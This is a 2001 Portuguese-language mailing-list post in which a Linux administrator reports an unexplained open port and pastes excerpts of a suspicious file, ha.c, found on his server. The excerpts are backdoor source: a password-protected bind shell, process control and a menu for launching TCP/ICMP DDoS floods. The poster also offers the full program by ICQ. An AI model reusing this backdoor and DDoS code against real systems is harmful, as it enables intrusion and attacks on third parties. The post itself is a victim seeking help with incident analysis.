Pessoal
Sem mais nem menos apareceu a porta 666 "doom" aberta no meu
sistema...alguém conhece esta porta?
Verifiquei no /etc/services e /etc/inetd.conf e está porta não consta...
Também achei alguns arquivos muito suspeitos no diretório /usr/tmp.
Detalhe:Ninguém tem acesso ao console(está em uma sala fechada) e os
arquivos foram criados num sábado a tarde, quando a empresa tb está fechada.
*bash
*ha
ha.c
Segue parte do prog: (Quem quiser o programa completo ou trocar
informações,contato ICQ 5934391)
---------------- ha.c ---------------------
#include <stdio.h>
...
/* definicoes */
#define PORTA 2426 /* porta que o backdoor bindar */
#define SENHA "msehaputaquepariu" /* oque acha de trocar isso aqui por sua
senha? */
#define DDOSDIR "/var/tmp/.mx" /* onde estao o icmpddos e o tcpddos */
/**************/
/* Buffer overflow no gets ()
descoberta por esc2 , na correcao foi usada uma funcao de nashleon */
#define maximo(x,y) ((x)>(y)?(x):(y)) /* aki estah */
#define SA struct sockaddr
#define DUNNO 5 /* i don't know hehehe...(eh pro listen() ;) */
#define MICROSOFT "SUCKS"
#define GRUPO "M"
#define EQUIPE "TecnoSis"
#define MAIL "[EMAIL PROTECTED]"
#define IRCSERVER "irc.brasnet.org"
#define NICK "PESTE-NEGRA"
int main(int argc, char **argv)
{
.....
int ddos()
{
char ddos[1024];
fprintf(stderr,"\n\33[0;36m---------------------------------------------\n")
;
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34mComando DDoS:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m - Os programas que podem ser usados sao o \n");
fprintf(stderr,"\33[0;1;34m TCPDDoS e o ICMPDDoS ou os dois juntos...\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m - Antes de comecar o ataque leia o README\n");
fprintf(stderr,"\33[0;1;34m do M-1...\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m OPCOES DE USO:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m tcpddos - Usa o programa TCPDDoS.\n");
fprintf(stderr,"\33[0;1;34m icmpddos - Usa o programa ICMPDDoS.\n");
fprintf(stderr,"\33[0;1;34m todos - Usa todos os dois programas.\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m Nota: e necessario o programa no mesmo\n");
fprintf(stderr,"\33[0;36m---------------------------------------------\33[0m
\n\n");
fprintf(stderr,"\33[0;36mDDoS> \33[0;31m");
gets(ddos);
ddos[strlen(ddos) -1] = '\0';
if (strcmp("icmpddos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
icmpddos();
}
if (strcmp("tcpddos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
tcpddos();
}
if (strcmp("todos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
todosddos();
}
fprintf(stderr,"\n\n");
}
...
int ajuda()
{
fprintf(stderr,"\n\33[0;36m----------------------------------------------\n"
);
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34mComando ajuda:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m shell - abre uma shell\n");
fprintf(stderr,"\33[0;1;34m proc - lista processos\n");
fprintf(stderr,"\33[0;1;34m ddos - faz ataque DDoS (M-1 requerido)\n");
fprintf(stderr,"\33[0;1;34m kill - 'mata' um processo\n");
fprintf(stderr,"\33[0;1;34m ajuda - Hm, oque sera este comando???\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m Nota: qualquer coisa que aconteca com
origem\n");
fprintf(stderr,"\33[0;1;34m deste programa, a responsabilidade e\n");
fprintf(stderr,"\33[0;1;34m completamente sua!!!\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;36m----------------------------------------------\33[0
m\n\n");
}
Assinantes em 16/03/2001: 2218
Mensagens recebidas desde 07/01/1999: 104042
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista:
mailto:[EMAIL PROTECTED]
